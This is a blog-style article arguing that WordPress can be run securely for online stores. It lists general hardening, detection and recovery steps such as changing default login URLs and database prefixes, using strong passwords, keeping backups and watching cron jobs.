We keep hearing about these data hackings and leaks nearly every day. Such news usually makes us wonder, if anything is safe online at all.
These breaches are usually bad news for businesses depended wholly on the internet as many of their customers tend to postpone their online purchases till they recover from such news which is frankly quite shocking to them.
Most online shoppers are very worried about their online privacy and payment security, and if they lose trust in a website they tend to ignore it for a long time which is very bad for the business.
A lot of businesses are suggested to move their websites onto newer and more complex platforms as a remedy and they are promised that it will prevent hacking attempts and reduce the malware attacks.
Most small businesses and professionals cannot afford to use these high-end and costly third party applications and they prefer free but reliable platforms such as Magento ,WordPress and other open source/free to use platforms.
However being open source they are usually high on user generated content and hence higher risk factors.
WordPress has been around for quite a while now and is loved by all for its ease of use and high customization ability. There are a lot of e-commerce applications built as plugins for WordPress to run online businesses which are used by millions of users around the world. However we have also been hearing how WordPress is very un-safe for ecommerce applications and even for other activities and how everyone should start opting for more ‘closed’ third party platforms to be ‘secured’.
Now millions and millions of websites and blogs are powered by WordPress more than any other such platform and this is the reason that we get to hear more bad news about wordPress sites and not because it is a poor platform.
Most users of WordPress use it as it is free, very user friendly, highly customizable and scalable. Also the fact that hundreds of thousands of techies are constantly working to add-on new features every day thorough ‘plugins’ which can be simply installed and used by all WordPress user alike, makes it a wonderful platform for most users.
This crowd/community support environment is what makes WordPress one of the most loved platform on the internet.
The features and customization provided by this humble ‘CMS’ are simply astounding and hence loved by most people young and old, techies and non-techies alike around the globe. Some of the notable users are mentioned below
Looking at the above list many of you might wonder if WordPress is so unsecure as many would like us to believe, how come some of the most influential and large organizations use it?
The answer is very simple: they take precautions and steps to make their WordPress secure and prevent mishaps.
Nothing in the world is full-proof and more so in the world of Internet. No software. Application or website can be 100% secure and hence neither is WordPress but there are some simple steps that can be taken to prevent the more common intrusions.
The process of making any online property secure is as follows:
1) Prevention: The first and logical step is to prevent an attacker by hiding from and delaying the attack so as to make the attack less relevant for the attacker. In WordPress you can do this by:
# changing the default Login URL: helps prevent brute force attacks
# changing the default DB prefixes: helps prevent SQL injection vulnerabilities.
# removing the WordPress version mentioned in the meta helps too as it prevents attackers from exploiting the known vulnerabilities of that particular version
# changing the default username (most people still use admin as the user name)
# blacklisting IPs for multiple failed login attempts and
# white listing an IP for admin login
# very important: use a combination of special characters, upper and lower case alphabets and numbers for passwords and usernames.
# Use captcha for forms , comments and logins.
# Do not provide write/edit access to unknown /un-verified users
# prevent file overwrites by removing the re-write access once the approved editing has been done such as in the htaccess file and wp-config.php file.
# Plugins and themes are the heart and soul of WordPress however, do not install plugins or themes from unverified or suspicious sources as they are one of the biggest source of malware and provide hidden doors to attackers.
# Make a habit of changing the passwords of your c-panel, dashboard every 3-6 months.
# Use sFTP protocol rather than simply FTP to access the files on our domain.
# keep your PC/Mac and the browsers free from malwares, malicious toolbars and other harmful software.
# use trusted encrypted payment gateways and never allow the payment process to go to un-encrypted space or page.
# keep your WordPress version and plugins up-to date
# Use a trusted, reputed and secure hosting provider with good after sales customer support with integrated tech support to help you out in case of troubles
# store backups of important files such the htaccess and wp-config.php so that they can compared for changes and restored in case of error.
# periodically back up your database for restoring in case of loss in attack.
2) Timely detection: If an attack does happen the next best thing to do is to detect the attack early and isolate it and prevent any further damage:
# Look for signs such as extremely low load time speeds.
# sighting of strange and previously unseen codes on the web pages.
# garbled text in the web pages.
# use a sitemap monitor to check for any new dynamic pages being created without your consent.
# perform periodic checks for any unauthorized changes to important files such as htaccess, wp-config.php etc.
# check CRON jobs in your server for any unauthorized or suspicious scheduled tasks
# keep a watch on webmaster tools for any spike in bot traffic or malware messages.
3) Recovery: After you have found and located the attack the next step is to isolate it and restore your normal operations:
# clean all installation files and host/server for any infections and then check the backups for any infections
# remove all vulnerabilities that caused the attack and then once the server and installation has been cleaned use the backups to restore your files and DB to get the site live again.
Note: Always take down the site once an attack has been detected so as to prevent the spread to visitors. Stop all emails, newsletters and commenting etc. and display a message informing everyone of the current situation if you still have access to the site. Else inform your hosting provider to take the site down.